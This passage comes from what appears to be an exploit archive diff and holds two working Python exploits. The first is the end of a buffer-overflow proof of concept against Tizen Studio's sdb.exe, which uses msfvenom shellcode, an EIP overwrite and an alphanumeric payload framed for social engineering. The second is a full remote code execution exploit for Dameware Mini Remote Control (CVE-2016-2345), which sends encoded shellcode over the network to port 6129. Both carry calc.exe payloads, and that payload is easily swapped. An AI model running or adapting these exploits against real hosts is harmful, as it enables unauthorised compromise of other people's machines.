buf += "\x5b\x73\x41\xf1\x54\x86\x9b\x35\x52\x79\xee\x4f\xa1"
buf += "\x04\xe9\x8b\xd8\xd2\x7c\x08\x7a\x90\x27\xf4\x7b\x75"
buf += "\xb1\x7f\x77\x32\xb5\xd8\x9b\xc5\x1a\x53\xa7\x4e\x9d"
buf += "\xb4\x2e\x14\xba\x10\x6b\xce\xa3\x01\xd1\xa1\xdc\x52"
buf += "\xba\x1e\x79\x18\x56\x4a\xf0\x43\x3c\x8d\x86\xf9\x72"
buf += "\x8d\x98\x01\x22\xe6\xa9\x8a\xad\x71\x36\x59\x8a\x8e"
buf += "\x7c\xc0\xba\x06\xd9\x90\xff\x4a\xda\x4e\xc3\x72\x59"
buf += "\x7b\xbb\x80\x41\x0e\xbe\xcd\xc5\xe2\xb2\x5e\xa0\x04"
buf += "\x61\x5e\xe1\x66\xe4\xcc\x69\x69"
stack_adj = "\x83\xEC\x7F" * 2 # SUB ESP,0x7F - stack adjustment
sc = stack_adj + buf
eip = "\x01\xed\x8b" # 008BED01 - 3 byte EIP overwrite
payload = "B" * 2000 + "\x90" * (2086 - len(sc) - 1) + "\x90" + sc + eip
print "Trying to exploit the binary... "
print "Payload length: " + str(len(payload))
print sdb_path + ARGS + payload
subprocess.Popen([sdb_path, "launch", "A", "A", "A", "A", "A", payload], stdout=subprocess.PIPE)
def tech_social_ascii(sdb_path, jmp_esp_addr):
eip = struct.pack('<L', int(jmp_esp_addr, 0))
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc -e x86/alpha_mixed BufferRegister=ESP -f python
buf = ""
buf += "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x4d\x38\x4e\x62\x77\x70\x63\x30\x35\x50\x71"
buf += "\x70\x6f\x79\x79\x75\x50\x31\x69\x50\x62\x44\x6c\x4b"
buf += "\x32\x70\x34\x70\x6e\x6b\x76\x32\x36\x6c\x6c\x4b\x63"
buf += "\x62\x45\x44\x6e\x6b\x61\x62\x37\x58\x76\x6f\x6f\x47"
buf += "\x70\x4a\x51\x36\x44\x71\x69\x6f\x4c\x6c\x45\x6c\x55"
buf += "\x31\x61\x6c\x36\x62\x54\x6c\x47\x50\x39\x51\x78\x4f"
buf += "\x74\x4d\x67\x71\x69\x57\x68\x62\x6b\x42\x36\x32\x53"
buf += "\x67\x4c\x4b\x61\x42\x52\x30\x6c\x4b\x31\x5a\x67\x4c"
buf += "\x4e\x6b\x32\x6c\x57\x61\x53\x48\x59\x73\x62\x68\x67"
buf += "\x71\x48\x51\x36\x31\x6c\x4b\x31\x49\x47\x50\x35\x51"
buf += "\x38\x53\x6e\x6b\x30\x49\x55\x48\x68\x63\x34\x7a\x31"
buf += "\x59\x4c\x4b\x50\x34\x6c\x4b\x33\x31\x5a\x76\x70\x31"
buf += "\x6b\x4f\x6c\x6c\x79\x51\x78\x4f\x46\x6d\x35\x51\x58"
buf += "\x47\x50\x38\x39\x70\x70\x75\x79\x66\x64\x43\x43\x4d"
buf += "\x4c\x38\x55\x6b\x63\x4d\x61\x34\x70\x75\x6d\x34\x72"
buf += "\x78\x4e\x6b\x61\x48\x45\x74\x47\x71\x78\x53\x72\x46"
buf += "\x6c\x4b\x44\x4c\x62\x6b\x4c\x4b\x51\x48\x35\x4c\x43"
buf += "\x31\x69\x43\x6c\x4b\x67\x74\x4e\x6b\x55\x51\x6e\x30"
buf += "\x6b\x39\x50\x44\x65\x74\x37\x54\x53\x6b\x63\x6b\x73"
buf += "\x51\x72\x79\x71\x4a\x72\x71\x4b\x4f\x59\x70\x43\x6f"
buf += "\x33\x6f\x32\x7a\x4e\x6b\x62\x32\x5a\x4b\x4e\x6d\x51"
buf += "\x4d\x32\x4a\x65\x51\x6e\x6d\x6b\x35\x6e\x52\x55\x50"
buf += "\x73\x30\x63\x30\x46\x30\x30\x68\x55\x61\x4c\x4b\x52"
buf += "\x4f\x4f\x77\x69\x6f\x5a\x75\x4d\x6b\x6c\x30\x6f\x45"
buf += "\x4c\x62\x53\x66\x30\x68\x79\x36\x4a\x35\x4d\x6d\x6f"
buf += "\x6d\x6b\x4f\x39\x45\x75\x6c\x55\x56\x53\x4c\x56\x6a"
buf += "\x6b\x30\x39\x6b\x6b\x50\x64\x35\x76\x65\x4d\x6b\x32"
buf += "\x67\x42\x33\x62\x52\x32\x4f\x71\x7a\x45\x50\x31\x43"
buf += "\x69\x6f\x6e\x35\x61\x73\x31\x71\x52\x4c\x73\x53\x75"
buf += "\x50\x41\x41"
stack_adj = "\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A"
stack_adj += "\x2d\x66\x4f\x66\x47\x2d\x4c\x31\x4c\x36\x2d\x67\x39\x6a\x2a\x2d\x57\x57\x57\x57\x50"
stack_adj += "\x50\x5C" + "A" * 4
ascii_nop_sleed = "C" * 70
payload = sdb_path + ARGS + "A" * 4086 + eip + "\x77\x21\x42\x42\x20" + ascii_nop_sleed + stack_adj + buf
print "Now sdb.exe user could be asked to run the following code from cmd line:"
print payload
f = open("sdb_poc.txt", 'w')
f.write(payload)
f.close()
print "The payload has been also saved to sdb_poc.txt file for your convenience"
def bonus_exercise():
print """Can you spot the bug here?
int launch_app(int argc, char** argv)
{
static const char *const SHELL_LAUNCH_CMD = "shell:/usr/bin/sdk_launch_app ";
char full_cmd[4096];
int i;
snprintf(full_cmd, sizeof full_cmd, "%s", SHELL_LAUNCH_CMD);
for (i=1 ; i<argc ; i++) {
strncat(full_cmd, " ", sizeof(full_cmd)-strlen(" ")-1);
strncat(full_cmd, argv[i], sizeof(full_cmd)-strlen(argv[i])-1);
}
}
"""
def usage():
print """Smart Development Bridge <=2.3.2 (part of Tizen Studio 1.3 Windows x86/x64) - Buffer Overflow PoC
by Marcin Kopec <m a r c i n \. k o p e c @ h o t m a i l . c o m>
Demonstrated Exploitation Techniques:
1: Direct execution, 3-byte EIP overwrite, Stack adjustment
2: Payload for social engineering attack, JMP ESP (!mona find -s "\\xff\\xe4" -cp alphanum), Alphanumeric shellcode
3: Bonus exercise - source code analysis
This code has been created for educational purposes only, to raise awareness on software security, and it's harmless
by intention (the PoC runs calc.exe). Please do not change the code behaviour to malicious
Usage: python sdbBOpoc.py [Technique_ID] [Path_to_sdb.exe] [Address_of_JMP_ESP]
Examples: python sdbBOpoc.py 1 C:\Tizen\Tools\sdb.exe
python sdbBOpoc.py 2 C:\Tizen\Tools\sdb.exe 0x76476557
python sdbBOpoc.py 3"""
def main():
if len(sys.argv) > 1:
if int(sys.argv[1]) == 1:
if len(sys.argv) == 3:
tech_direct_exec(sys.argv[2])
if int(sys.argv[1]) == 2:
if len(sys.argv) == 4:
tech_social_ascii(sys.argv[2], sys.argv[3])
if int(sys.argv[1]) == 3:
bonus_exercise()
else:
usage()
if __name__ == '__main__':
main()

79
platforms/windows/remote/43059.py Executable file
View file

@ -0,0 +1,79 @@
# Exploit Title: Dameware Remote Controller RCE
# Date: 3-04-2016
# Exploit Author: Securifera
# Vendor Homepage: http://www.dameware.com/products/mini-remote-control/product-overview.aspx
# Version: 12.0.0.520
# Website: https://www.securifera.com/blog/2016/04/03/fun-with-remote-controllers-dameware-mini-remote-control-cve-2016-2345/
# CVE : CVE-2016-2345
import socket
import sys
import os
import time
import struct
import binascii
import random
# windows/exec - 220 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc.exe
sc = ""
sc += "\xba\x01\xa8\x4f\x9e\xd9\xca\xd9\x74\x24\xf4\x5e\x29"
sc += "\xc9\xb1\x31\x31\x56\x13\x03\x56\x13\x83\xee\xfd\x4a"
sc += "\xba\x62\x15\x08\x45\x9b\xe5\x6d\xcf\x7e\xd4\xad\xab"
sc += "\x0b\x46\x1e\xbf\x5e\x6a\xd5\xed\x4a\xf9\x9b\x39\x7c"
sc += "\x4a\x11\x1c\xb3\x4b\x0a\x5c\xd2\xcf\x51\xb1\x34\xee"
sc += "\x99\xc4\x35\x37\xc7\x25\x67\xe0\x83\x98\x98\x85\xde"
sc += "\x20\x12\xd5\xcf\x20\xc7\xad\xee\x01\x56\xa6\xa8\x81"
sc += "\x58\x6b\xc1\x8b\x42\x68\xec\x42\xf8\x5a\x9a\x54\x28"
sc += "\x93\x63\xfa\x15\x1c\x96\x02\x51\x9a\x49\x71\xab\xd9"
sc += "\xf4\x82\x68\xa0\x22\x06\x6b\x02\xa0\xb0\x57\xb3\x65"
sc += "\x26\x13\xbf\xc2\x2c\x7b\xa3\xd5\xe1\xf7\xdf\x5e\x04"
sc += "\xd8\x56\x24\x23\xfc\x33\xfe\x4a\xa5\x99\x51\x72\xb5"
sc += "\x42\x0d\xd6\xbd\x6e\x5a\x6b\x9c\xe4\x9d\xf9\x9a\x4a"
sc += "\x9d\x01\xa5\xfa\xf6\x30\x2e\x95\x81\xcc\xe5\xd2\x7e"
sc += "\x87\xa4\x72\x17\x4e\x3d\xc7\x7a\x71\xeb\x0b\x83\xf2"
sc += "\x1e\xf3\x70\xea\x6a\xf6\x3d\xac\x87\x8a\x2e\x59\xa8"
sc += "\x39\x4e\x48\xcb\xdc\xdc\x10\x22\x7b\x65\xb2\x3a"
port = 6129
if len (sys.argv) == 2:
(progname, host ) = sys.argv
else:
print len (sys.argv)
print 'Usage: {0} host'.format (sys.argv[0])
exit (1)
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )
type = 444.0
buf = struct.pack("I", 4400 ) #Init Version
buf += "\xcc"*4
buf += struct.pack("d", type) #Minor Version
buf += struct.pack("d", type) #Minor Version
buf += (40 - len(buf)) * "C"
csock.send(buf)
wstr = "\x90" * 0x10 #nop sled
wstr += sc #calc shellcode
wstr += "\x90" * (0x2ac - 0x10 - len(sc))
wstr += "\xeb\x06\xff\xff" #short jump forward
wstr += struct.pack("I", 0x00401161 ) #pop pop return gadget
wstr += "\x90" * 3 #nop
wstr += "\xe9\x6b\xfa\xff\xff" #short jump back to shellcode
wstr += "E" * 0xbc
wstr += ("%" + "\x00" + "c" + "\x00")*5
buf = struct.pack("I", 0x9c44) #msg type
buf += wstr #payload
buf += "\x00" * (0x200) #null bytes
csock.send(buf)
print binascii.hexlify(csock.recv(0x4000)) #necessary reads
print binascii.hexlify(csock.recv(0x4000))
csock.close()